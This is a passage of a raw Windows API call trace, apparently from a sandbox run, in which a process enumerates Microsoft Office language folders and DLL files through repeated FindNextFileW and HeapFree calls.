dwReserved1=0x2e0000, cFileName="pt-BR", cAlternateFileName="")) returned 1 [0064.534] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43b20f0 | out: hHeap=0x5d0000) returned 1 [0064.534] FindNextFileW (in: hFindFile=0x4260388, lpFindFileData=0x348eb94 | out: lpFindFileData=0x348eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf4ba375b, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x6e5cc4e, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x6e5cc4e, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="pt-pt", cAlternateFileName="")) returned 1 [0064.535] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43b20f0 | out: hHeap=0x5d0000) returned 1 [0064.535] FindNextFileW (in: hFindFile=0x4260388, lpFindFileData=0x348eb94 | out: lpFindFileData=0x348eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf0063153, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x6e5cc4e, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x6e5cc4e, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="ro", cAlternateFileName="")) returned 1 [0064.537] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43b20f0 | out: hHeap=0x5d0000) returned 1 [0064.537] FindNextFileW (in: hFindFile=0x4260388, lpFindFileData=0x348eb94 | out: lpFindFileData=0x348eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf13037fa, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf71003, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf71003, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="ru", cAlternateFileName="")) returned 1 [0064.539] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43b20f0 | out: hHeap=0x5d0000) returned 1 [0064.539] FindNextFileW (in: hFindFile=0x4260388, lpFindFileData=0x348eb94 | out: lpFindFileData=0x348eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf42b29f3, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x865a7d2, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x865a7d2, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="sk", cAlternateFileName="")) returned 1 [0064.562] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43b20f0 | out: hHeap=0x5d0000) returned 1 [0064.562] FindNextFileW (in: hFindFile=0x4260388, lpFindFileData=0x348eb94 | out: lpFindFileData=0x348eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf1ae94c9, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x633d60, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x633d60, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="sl", cAlternateFileName="")) returned 1 [0064.611] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43b20f0 | out: hHeap=0x5d0000) returned 1 [0064.612] FindNextFileW (in: hFindFile=0x4260388, lpFindFileData=0x348eb94 | out: lpFindFileData=0x348eb94*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x95505c, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x95505c, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x133819a5, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x45c38, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="sqmapi_x64.dll", cAlternateFileName="SQMAPI~1.DLL")) returned 1 [0064.613] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43b20f0 | out: hHeap=0x5d0000) returned 1 [0064.613] FindNextFileW (in: hFindFile=0x4260388, lpFindFileData=0x348eb94 | out: lpFindFileData=0x348eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf6aee686, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x6d05722, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x6d05722, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="sr-Latn", cAlternateFileName="")) returned 1 [0065.091] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43b20f0 | out: hHeap=0x5d0000) returned 1 [0065.091] FindNextFileW (in: hFindFile=0x4260388, lpFindFileData=0x348eb94 | out: lpFindFileData=0x348eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf42b29f3, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x865a7d2, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x865a7d2, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="sr-Latn-CS", cAlternateFileName="SR-LAT~1")) returned 1 [0065.092] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43b20f0 | out: hHeap=0x5d0000) returned 1 [0065.092] FindNextFileW (in: hFindFile=0x4260388, lpFindFileData=0x348eb94 | out: lpFindFileData=0x348eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa25d2ba, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x670f8d9, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x670f8d9, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="sv", cAlternateFileName="")) returned 1 [0065.093] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43b20f0 | out: hHeap=0x5d0000) returned 1 [0065.093] FindNextFileW (in: hFindFile=0x4260388, lpFindFileData=0x348eb94 | out: lpFindFileData=0x348eb94*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf6cde4ae, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf6cde4ae, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf6cde4ae, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x1c2b0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="System.Spatial.NetFX35.dll", cAlternateFileName="SYSTEM~1.DLL")) returned 1 [0065.095] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43b20f0 | out: hHeap=0x5d0000) returned 1 [0065.095] FindNextFileW (in: hFindFile=0x4260388, lpFindFileData=0x348eb94 | out: lpFindFileData=0x348eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa8eba59, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x453c2a7, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x453c2a7, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="tr", cAlternateFileName="")) returned 1 [0065.096] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43b20f0 | out: hHeap=0x5d0000) returned 1 [0065.096] FindNextFileW (in: hFindFile=0x4260388, lpFindFileData=0x348eb94 | out: lpFindFileData=0x348eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xefd8e49f, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x37f90ac, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x37f90ac, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="uk", cAlternateFileName="")) returned 1 [0065.097] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43b20f0 | out: hHeap=0x5d0000) returned 1 [0065.097] FindNextFileW (in: hFindFile=0x4260388, lpFindFileData=0x348eb94 | out: lpFindFileData=0x348eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf4692737, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x4abf9f4, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x4abf9f4, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="vi", cAlternateFileName="")) returned 1 [0065.099] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43b20f0 | out: hHeap=0x5d0000) returned 1 [0065.099] FindNextFileW (in: hFindFile=0x4260388, lpFindFileData=0x348eb94 | out: lpFindFileData=0x348eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf1e56af1, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x680214, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x680214, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="zh-HANS", cAlternateFileName="")) returned 1 [0065.106] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43b20f0 | out: hHeap=0x5d0000) returned 1 [0065.106] FindNextFileW (in: hFindFile=0x4260388, lpFindFileData=0x348eb94 | out: lpFindFileData=0x348eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf00af60a, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfa5581c0, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfa5581c0, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="zh-HANT", cAlternateFileName="")) returned 1 [0065.108] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43b20f0 | out: hHeap=0x5d0000) returned 1 [0065.108] FindNextFileW (in: hFindFile=0x4260388, lpFindFileData=0x348eb94 | out: lpFindFileData=0x348eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf00af60a, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfa5581c0, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfa5581c0, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="zh-HANT", cAlternateFileName="")) returned 0 [0065.108] FindClose (in: hFindFile=0x4260388 | out: hFindFile=0x4260388) returned 1 [0065.108] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43a20e8 | out: hHeap=0x5d0000) returned 1 [0065.108] FindNextFileW (in: hFindFile=0x4260508, lpFindFileData=0x348ee10 | out: lpFindFileData=0x348ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xefd42039, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x895576a, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x895576a, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="bin", cAlternateFileName="")) returned 0 [0065.108] FindClose (in: hFindFile=0x4260508 | out: hFindFile=0x4260508) returned 1 [0065.108] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4341020 | out: hHeap=0x5d0000) returned 1 [0065.110] FindNextFileW (in: hFindFile=0x4260648, lpFindFileData=0x348f08c | out: lpFindFileData=0x348f08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1992fb3, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1992fb3, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x2283d0f, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x3688, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="MSOSEC.DLL", cAlternateFileName="")) returned 1 [0065.112] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43a20e8 | out: hHeap=0x5d0000) returned 1 [0065.112] FindNextFileW (in: hFindFile=0x4260648, lpFindFileData=0x348f08c | out: lpFindFileData=0x348f08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xefd42039, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x1525a179, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1525a179, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="Power View Excel Add-in", cAlternateFileName="POWERV~1")) returned 1 [0065.114] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43b20f0 | out: hHeap=0x5d0000) returned 1 [0065.114] FindNextFileW (in: hFindFile=0x4260608, lpFindFileData=0x348ee10 | out: lpFindFileData=0x348ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf12dd5ae, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x133819a5, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x133819a5, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="bg", cAlternateFileName="")) returned 1 [0065.116] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43b20f0 | out: hHeap=0x5d0000) returned 1 [0065.116] FindNextFileW (in: hFindFile=0x4260608, lpFindFileData=0x348ee10 | out: lpFindFileData=0x348ee10*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x133a7bf5, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x133a7bf5, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x133cde53, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x4090, dwReserved0=0x0, dwReserved1=0x0, cFileName="BI-Report.png", cAlternateFileName="BI-REP~1.PNG")) returned 1 [0065.118] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43b20f0 | out: hHeap=0x5d0000) returned 1 [0065.118] FindNextFileW (in: hFindFile=0x4260608, lpFindFileData=0x348ee10 | out: lpFindFileData=0x348ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf9a9d821, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x133cde53, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x133cde53, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="cs", cAlternateFileName="")) returned 1 [0065.120] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43b20f0 | out: hHeap=0x5d0000) returned 1 [0065.120] FindNextFileW (in: hFindFile=0x4260608, lpFindFileData=0x348ee10 | out: lpFindFileData=0x348ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6a6473, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1341a2e5, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1341a2e5, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="da", cAlternateFileName="")) returned 1 [0065.122] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43b20f0 | out: hHeap=0x5d0000) returned 1 [0065.122] FindNextFileW (in: hFindFile=0x4260608, lpFindFileData=0x348ee10 | out: lpFindFileData=0x348ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf6354def, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x133f40a9, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x133f40a9, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="de", cAlternateFileName="")) returned 1 [0065.124] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43b20f0 | out: hHeap=0x5d0000) returned 1 [0065.124] FindNextFileW (in: hFindFile=0x4260608, lpFindFileData=0x348ee10 | out: lpFindFileData=0x348ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf46b8986, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x1341a2e5, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1341a2e5, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="el", cAlternateFileName="")) returned 1 [0065.126] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43b20f0 | out: hHeap=0x5d0000) returned 1 [0065.126] FindNextFileW (in: hFindFile=0x4260608, lpFindFileData=0x348ee10 | out: lpFindFileData=0x348ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf7582db3, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x1341a2e5, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1341a2e5, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="es", cAlternateFileName="")) returned 1 [0065.127] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43b20f0 | out: hHeap=0x5d0000) returned 1 [0065.127] FindNextFileW (in: hFindFile=0x4260608, lpFindFileData=0x348ee10 | out: lpFindFileData=0x348ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf1b0f72e, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x13440553, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x13440553, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="et", cAlternateFileName="")) returned 1 [0065.129] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43b20f0 | out: hHeap=0x5d0000) returned 1 [0065.129] FindNextFileW (in: hFindFile=0x4260608, lpFindFileData=0x348ee10 | out: lpFindFileData=0x348ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf6d2a978, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x1341a2e5, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1341a2e5, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="eu", cAlternateFileName="")) returned 1 [0065.526] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42e1008 | out: hHeap=0x5d0000) returned 1 [0065.526] FindNextFileW (in: hFindFile=0x4260608, lpFindFileData=0x348ee10 | out: lpFindFileData=0x348ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf18f9628, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x138defa8, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x138defa8, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="fi", cAlternateFileName="")) returned 1 [0065.529] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42e1008 | out: hHeap=0x5d0000) returned 1 [0065.529] FindNextFileW (in: hFindFile=0x4260608, lpFindFileData=0x348ee10 | out: lpFindFileData=0x348ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf1ae94c9, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x13440553, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x13440553, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="fr", cAlternateFileName="")) returned 1 [0065.531] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42e1008 | out: hHeap=0x5d0000) returned 1 [0065.531] FindNextFileW (in: hFindFile=0x4260608, lpFindFileData=0x348ee10 | out: lpFindFileData=0x348ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf9ac3a61, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x13aced2b, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x13aced2b, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="gl", cAlternateFileName="")) returned 1 [0065.533] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42e1008 | out: hHeap=0x5d0000) returned 1 [0065.533] FindNextFileW (in: hFindFile=0x4260608, lpFindFileData=0x348ee10 | out: lpFindFileData=0x348ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf4a98712, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x13a8299e, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x13a8299e, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="he", cAlternateFileName="")) returned 1 [0065.535] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42e1008 | out: hHeap=0x5d0000) returned 1 [0065.535] FindNextFileW (in: hFindFile=0x4260608, lpFindFileData=0x348ee10 | out: lpFindFileData=0x348ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa806c3d, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x1428e945, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1428e945, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="hi", cAlternateFileName="")) returned 1 [0065.538] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42e1008 | out: hHeap=0x5d0000) returned 1 [0065.538] FindNextFileW (in: hFindFile=0x4260608, lpFindFileData=0x348ee10 | out: lpFindFileData=0x348ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf7beb2bc, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x13b67741, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x13b67741, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="hr", cAlternateFileName="")) returned 1 [0065.548] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42e1008 | out: hHeap=0x5d0000) returned 1 [0065.548] FindNextFileW (in: hFindFile=0x4260608, lpFindFileData=0x348ee10 | out: lpFindFileData=0x348ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf6164f96, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x14648313, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x14648313, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="hu", cAlternateFileName="")) returned 1 [0065.559] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42e1008 | out: hHeap=0x5d0000) returned 1 [0065.559] FindNextFileW (in: hFindFile=0x4260608, lpFindFileData=0x348ee10 | out: lpFindFileData=0x348ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf18f9628, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x1434d390, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1434d390, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="id", cAlternateFileName="")) returned 1 [0065.561] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42e1008 | out: hHeap=0x5d0000) returned 1 [0065.561] FindNextFileW (in: hFindFile=0x4260608, lpFindFileData=0x348ee10 | out: lpFindFileData=0x348ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf964b3dd, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x14969496, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x14969496, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="it", cAlternateFileName="")) returned 1 [0065.562] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42e1008 | out: hHeap=0x5d0000) returned 1 [0065.562] FindNextFileW (in: hFindFile=0x4260608, lpFindFileData=0x348ee10 | out: lpFindFileData=0x348ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf15d84bd, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x146e0bdc, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x146e0bdc, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ja", cAlternateFileName="")) returned 1 [0065.564] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42e1008 | out: hHeap=0x5d0000) returned 1 [0065.564] FindNextFileW (in: hFindFile=0x4260608, lpFindFileData=0x348ee10 | out: lpFindFileData=0x348ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfae6f174, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x14b330aa, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x14b330aa, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="kk", cAlternateFileName="")) returned 1 [0065.566] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42e1008 | out: hHeap=0x5d0000) returned 1 [0065.566] FindNextFileW (in: 